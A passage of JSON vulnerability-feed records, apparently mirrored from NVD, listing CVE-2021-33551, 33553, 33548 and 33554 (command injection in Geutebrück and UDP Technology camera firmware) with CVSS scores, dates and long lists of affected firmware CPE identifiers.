"cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33551", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:15", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33553", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33553"], "modified": "2022-11-21T19:36:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33553", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33553", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:16", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33548", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33548"], "modified": "2022-11-21T19:36:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-code_een-2040_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27"], "id": "CVE-2021-33548", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33548", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2241_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_eec-2400_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2010_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2271_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2239_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-code_een-2040_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2111_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2110_firmware:1.12.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ebc-2112_firmware:1.12.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27:*:*:*:*:*:*:*", "cpe:2.3:o:geutebrueck:g-cam_efd-2250_firmware:1.12.0.27:*:*:*:*:*:*:*"]}, {"lastseen": "2022-11-21T21:40:16", "description": "Multiple camera devices by UDP Technology, Geutebr\u00c3\u00bcck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-13T18:15:00", "type": "cve", "title": "CVE-2021-33554", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33554"], "modified": "2022-11-21T19:29:00", "cpe": ["cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2230_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_efd-2241_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_efd-2250_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ebc-2110_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ebc-2112_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ewpc-2270_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-code_een-2010_firmware:1.12.13.2", "cpe:/o:geutebrueck:g-cam_ewpc-2275_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2240_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_ebc-2111_firmware:1.12.0.27", "cpe:/o:geutebrueck:g-cam_efd-2251_firmware:1.12.14.5", "cpe:/o:geutebrueck:g-cam_ethc-2249_firmware:1.12.0.27", 